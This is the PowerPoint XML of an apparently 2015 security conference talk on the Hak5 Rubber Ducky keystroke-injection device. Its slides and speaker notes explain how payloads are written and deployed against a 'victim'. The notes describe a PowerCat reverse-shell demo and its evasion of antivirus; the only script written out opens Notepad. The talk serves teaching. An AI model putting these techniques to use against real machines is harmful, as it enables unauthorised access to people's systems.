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sldIdLst>
    <p:sldId id="256" r:id="rId5"/>
    <p:sldId id="257" r:id="rId6"/>
    <p:sldId id="263" r:id="rId7"/>
    <p:sldId id="262" r:id="rId8"/>
    <p:sldId id="261"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9050" autoAdjust="0"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr snapToGrid="0">
      <p:cViewPr varScale="1">
        <p:scale>
          <a:sx n="81" d="100"/>
          <a:sy n="81" d="100"/>
        </p:scale>
        <p:origin x="149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B84-FE49-4071-B198-FBE474D4C03F}" type="datetimeFigureOut">
              <a:rPr lang="en-AU" smtClean="0"/>
              <a:t>11/02/2015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F06CE-E1B7-445C-9D4E-EA7E6E11B30B}" type="slidenum">
              <a:rPr lang="en-AU" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-AU"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="165100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Good morning everyone</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" baseline="0" dirty="0" smtClean="0"/>
              <a:t> and welcome to fun with the HAK 5 rubber ducky. My name is Kieran Jacobsen, I work for Readify as a Technical Lead with a focus on Windows Infrastructure, PowerShell and Azure. When not working, I am an avid blogger, gamer and coder. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-AU" baseline="0" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-AU" baseline="0" dirty="0" smtClean="0"/>
              <a:t>My aim for this very quick presentation is to show you a few different things you can do with programmable human interface device like the rubber ducky. Once this is over, I will be in the events area with Ash and Bull with some other demonstrations.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{F80F06CE-E1B7-445C-9D4E-EA7E6E11B30B}" type="slidenum">
              <a:rPr lang="en-AU" smtClean="0"/>
              <a:t>1</a:t>
            </a:fld>
            <a:endParaRPr lang="en-AU"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="336690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what is the simplest way to describe the rubber ducky? The rubber ducky is a keyboard of sorts, with a processor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" baseline="0" dirty="0" smtClean="0"/>
              <a:t> that can be controlled via a simple scripting language. The ducky connects to a victims device as a HID or human interface device, where it acts as a keyboard that can type at around 1000 words per minute. The original use for these devices was automation. Allowing administrators a simple method of running the same command on a large number machines quickly and effectively. Of course, this simple automation tool can be turned to malicious proposes. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-AU" baseline="0" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-AU" baseline="0" dirty="0" smtClean="0"/>
              <a:t>So what can the ducky do? A payload can be anything that can be entered into a keyboard. If you could type it on a keyboard, then so can the ducky. Modify settings, open backdoors, reverse shells, your imagination is pretty much the limit. The duck is effective against any modern operating system, Windows, Apple OSX, Linux and even Android. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-AU" baseline="0" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-AU" baseline="0" dirty="0" smtClean="0"/>
              <a:t>Unlike similar devices, it is much easier to modify payloads on the ducky as it stores its payloads on a Micro SD card. There are a number of different firmware images available along side the one it is shipped with. These include features such as multiple payloads, with control typically via the CAPSLOCK and NUMLOCK keys, whilst others allow the SD card to be accessible to the victim PC. For my demonstrations today, I am using a rom which does both. I can trigger two different payloads depending on if the CAPSLOG or NUMLOCK key is on, and I can also read and write to the micro SD card from the victim PC. Whilst this sounds great, there is a downside. With this rom I am limited to an encoded payload of 2 kilobytes. Whilst there is a lot you can do, it doesn’t leave you with much wiggle room.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-AU" baseline="0" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-AU" baseline="0" dirty="0" smtClean="0"/>
              <a:t>Let’s take a look at writing a payload.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{F80F06CE-E1B7-445C-9D4E-EA7E6E11B30B}" type="slidenum">
              <a:rPr lang="en-AU" smtClean="0"/>
              <a:t>2</a:t>
            </a:fld>
            <a:endParaRPr lang="en-AU"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="83939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development of a payload is pretty simple.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-AU" baseline="0" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-AU" baseline="0" dirty="0" smtClean="0"/>
              <a:t>We start by writing a script using the Duck Script syntax. This is a really simple language consisting of elements like delay, string, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>gui</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" baseline="0" dirty="0" smtClean="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>capslock</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" baseline="0" dirty="0" smtClean="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>numlock</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" baseline="0" dirty="0" smtClean="0"/>
              <a:t> and more; which are all very self explanatory. I will show you an example in a moment. We save this as a simple text file.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-AU" baseline="0" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-AU" baseline="0" dirty="0" smtClean="0"/>
              <a:t>Once you have a script written, you then need to encode it. The encoder will output a binary file which we will then place on a micro SD card and place in the ducky. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-AU" baseline="0" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-AU" baseline="0" dirty="0" smtClean="0"/>
              <a:t>Now we are done, we can insert out ducky into the victim device.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-AU" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-AU" dirty="0" smtClean="0"/>
              <a:t>Before</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" baseline="0" dirty="0" smtClean="0"/>
              <a:t> I show the scripts, these, and others will all be up on my website, so don’t worry about trying to madly write them  all down.</a:t>
            </a:r>
            <a:endParaRPr lang="en-AU" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-AU" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-AU" dirty="0" smtClean="0"/>
              <a:t>Let’s take a look at a simple script.</a:t>
            </a:r>
            <a:endParaRPr lang="en-AU" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{F80F06CE-E1B7-445C-9D4E-EA7E6E11B30B}" type="slidenum">
              <a:rPr lang="en-AU" smtClean="0"/>
              <a:t>3</a:t>
            </a:fld>
            <a:endParaRPr lang="en-AU"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="165732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is a very simple script. We start every script by waiting. This is simply to allow the operating system to detect the ducky. We will bring up a run dialog by typing windows key and R, enter notepad and then hit enter.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-AU" baseline="0" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-AU" baseline="0" dirty="0" smtClean="0"/>
              <a:t>The rest is fairly simple. We are just going to type a greeting and then the first few lines from the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>CrikeyCon</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" baseline="0" dirty="0" smtClean="0"/>
              <a:t> website.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-AU" baseline="0" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-AU" baseline="0" dirty="0" smtClean="0"/>
              <a:t>Let’s see it in action.</a:t>
            </a:r>
            <a:endParaRPr lang="en-AU" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{F80F06CE-E1B7-445C-9D4E-EA7E6E11B30B}" type="slidenum">
              <a:rPr lang="en-AU" smtClean="0"/>
              <a:t>4</a:t>
            </a:fld>
            <a:endParaRPr lang="en-AU"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="338011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now take a look</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" baseline="0" dirty="0" smtClean="0"/>
              <a:t> at a more interesting script.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-AU" baseline="0" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-AU" dirty="0" smtClean="0"/>
              <a:t>Firstly, we will have a small delay, and then we are toggling</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" baseline="0" dirty="0" smtClean="0"/>
              <a:t> CAPSLOCK. The reason why we need to do this, is with my firmware, I am triggering this script off by having the CAPSLOCK switched on, hence before I type anything else, I want it switched off. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-AU" baseline="0" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-AU" baseline="0" dirty="0" smtClean="0"/>
              <a:t>Much like last time, we are opening the run dialog again but instead of notepad, this time we are running PowerShell and specifying a command to run.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-AU" baseline="0" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-AU" baseline="0" dirty="0" smtClean="0"/>
              <a:t>And what PowerShell commands are we running? Well, simply put, we are looking for a drive with the volume “ducky” and then importing the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>Powercat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" baseline="0" dirty="0" smtClean="0"/>
              <a:t> module. So what is </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>PowerCat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" baseline="0" dirty="0" smtClean="0"/>
              <a:t>? Well, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>PowerCat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" baseline="0" dirty="0" smtClean="0"/>
              <a:t> is a version of net cat, written entirely in PowerShell. Say good by to your </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>av</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" baseline="0" dirty="0" smtClean="0"/>
              <a:t> products picking up nc.exe, and say hello to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>PowerCat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" baseline="0" dirty="0" smtClean="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>PowerCat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" baseline="0" dirty="0" smtClean="0"/>
              <a:t> has most of the features of net cat, it isn’t quite there but is getting there. One nice feature is that with the –EP parameter, your connection will be a PowerShell console. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-AU" baseline="0" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-AU" baseline="0" dirty="0" smtClean="0"/>
              <a:t>Back to the script, once we have imported the module, we will start a client connection back to my Kali box at that IP and port.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-AU" baseline="0" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-AU" baseline="0" dirty="0" smtClean="0"/>
              <a:t>Let’s take a look.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{F80F06CE-E1B7-445C-9D4E-EA7E6E11B30B}" type="slidenum">
              <a:rPr lang="en-AU" smtClean="0"/>
              <a:t>5</a:t>
            </a:fld>
            <a:endParaRPr lang="en-AU"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="21583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Before I</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" baseline="0" dirty="0" smtClean="0"/>
              <a:t> ask if anyone has any questions, I thought it might be good to put up some links.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-AU" baseline="0" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-AU" baseline="0" dirty="0" smtClean="0"/>
              <a:t>Firstly my twitter and website, I will post up all of the demonstrations from this presentation as well as the ones I will be doing later to my website. My twitter address is @</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>kjacobsen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" baseline="0" dirty="0" smtClean="0"/>
              <a:t>, my new website can be found at poshsecurity.com.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-AU" baseline="0" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-AU" baseline="0" dirty="0" smtClean="0"/>
              <a:t>To begin with, go to the Hak5 shop to buy your own ducky, also check out their forums and project wiki for tips, tricks and payload ideas.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-AU" baseline="0" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-AU" baseline="0" dirty="0" smtClean="0"/>
              <a:t>Next is one of the best resources for working with the ducky. Ducky Decode is a great website consisting of alternate firmware, a new encoder and a pile of documentation. It is my number one resource. Documentation covered includes alternate firmware documentation and flashing of new firmware.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-AU" baseline="0" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-AU" baseline="0" dirty="0" smtClean="0"/>
              <a:t>Next are two payload generators. The first is the Duck Toolkit, this includes a web based payload encoder as well as a generator. The payloads generated can be quite large due to the method that the developer has used. With the duck toolkit, scripts are typed out in notepad, saved, and then executed in PowerShell. This process can be a little bit inefficient, but has its merits.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-AU" baseline="0" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-AU" baseline="0" dirty="0" smtClean="0"/>
              <a:t>The Simple Ducky Payload generator is another site dedicated to providing assistance in generating payloads. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" baseline="0" smtClean="0"/>
              <a:t>The usefulness </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" baseline="0" dirty="0" smtClean="0"/>
              <a:t>of these may vary but it is also worth checking out.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-AU" baseline="0" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-AU" baseline="0" dirty="0" smtClean="0"/>
              <a:t>Finally, power cat. I used this in my reverse shell demo earlier. If you like net cat, then checkout power cat. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-AU" baseline="0" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-AU" baseline="0" dirty="0" smtClean="0"/>
              <a:t>Does anyone have any questions?</a:t>
            </a:r>
            <a:endParaRPr lang="en-AU" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{F80F06CE-E1B7-445C-9D4E-EA7E6E11B30B}" type="slidenum">
              <a:rPr lang="en-AU" smtClean="0"/>
              <a:t>6</a:t>
            </a:fld>
            <a:endParaRPr lang="en-AU"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="273582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2/11/2015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2/11/2015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j.mp/168aIv7" TargetMode="External"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://poshsecurity.com/" TargetMode="External"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://j.mp/1Dknguj"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j.mp/1LyNZJB" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://j.mp/1D15dvw" TargetMode="External"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://j.mp/1yYJEFC" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://j.mp/18ELmH0" TargetMode="External"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://j.mp/168aD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3232484"/>
            <a:ext cx="8676222" cy="1660357"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-AU" dirty="0" smtClean="0"/>
              <a:t>Fun with the HaK5 Rubber Ducky</a:t>
            </a:r>
            <a:endParaRPr lang="en-AU" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Subtitle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1751012" y="4892842"/>
            <a:ext cx="8676222" cy="898358"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-AU" dirty="0" smtClean="0"/>
              <a:t>Kieran Jacobsen - Readify</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-AU" dirty="0" smtClean="0"/>
              <a:t>@</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" dirty="0" err="1" smtClean="0"/>
              <a:t>kjacobsen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" dirty="0" smtClean="0"/>
              <a:t> – http://poshsecurity.com</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01" y="216570"/>
            <a:ext cx="5361626" cy="30159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25" y="4792078"/>
            <a:ext cx="2102630" cy="999122"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2941020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it?</a:t>
            </a:r>
            <a:endParaRPr lang="en-AU" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-AU" dirty="0" smtClean="0"/>
              <a:t>Simplest description: “Keyboard” coupled with a processor and a simple scripting language</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-AU" dirty="0" smtClean="0"/>
              <a:t>Payload is anything that can be entered via the keyboard  - read/change settings, open backdoors, initiating reverse shells…</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-AU" dirty="0" smtClean="0"/>
              <a:t>Effective against any modern operating system that accepts a USB keyboard – Windows, OSX, Linux and even Android </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-AU" dirty="0" smtClean="0"/>
              <a:t>Payload is stored on Micro SD</a:t>
            </a:r>
            <a:endParaRPr lang="en-AU" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-AU" dirty="0" smtClean="0"/>
              <a:t>Multiple firmware options each with different features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905" y="247316"/>
            <a:ext cx="4826000" cy="2032000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="365330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Payload development</a:t>
            </a:r>
            <a:endParaRPr lang="en-AU" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-AU" dirty="0" smtClean="0"/>
              <a:t>Develop your script using the “duck script”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-AU" dirty="0" smtClean="0"/>
              <a:t>DELAY, STRING, GUI, ENTER, CAPSLOCK, NUMLOCK…</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-AU" dirty="0" smtClean="0"/>
              <a:t>Encode the script</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-AU" dirty="0" smtClean="0"/>
              <a:t>Place the encoded script onto the SD card</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-AU" dirty="0" smtClean="0"/>
              <a:t>Insert ducky into victim</a:t>
            </a:r>
            <a:endParaRPr lang="en-AU" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="174342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463639"/>
            <a:ext cx="9905998" cy="5950040"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="180975" indent="-180975">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-AU" dirty="0">
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>DELAY 500</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="180975" indent="-180975">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-AU" dirty="0">
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>GUI R</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="180975" indent="-180975">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-AU" dirty="0">
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>DELAY 500</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="180975" indent="-180975">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-AU" dirty="0">
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>STRING notepad</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="180975" indent="-180975">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-AU" dirty="0">
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>ENTER</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="180975" indent="-180975">
              <a:buNone/>
            </a:pPr>
            <a:r>
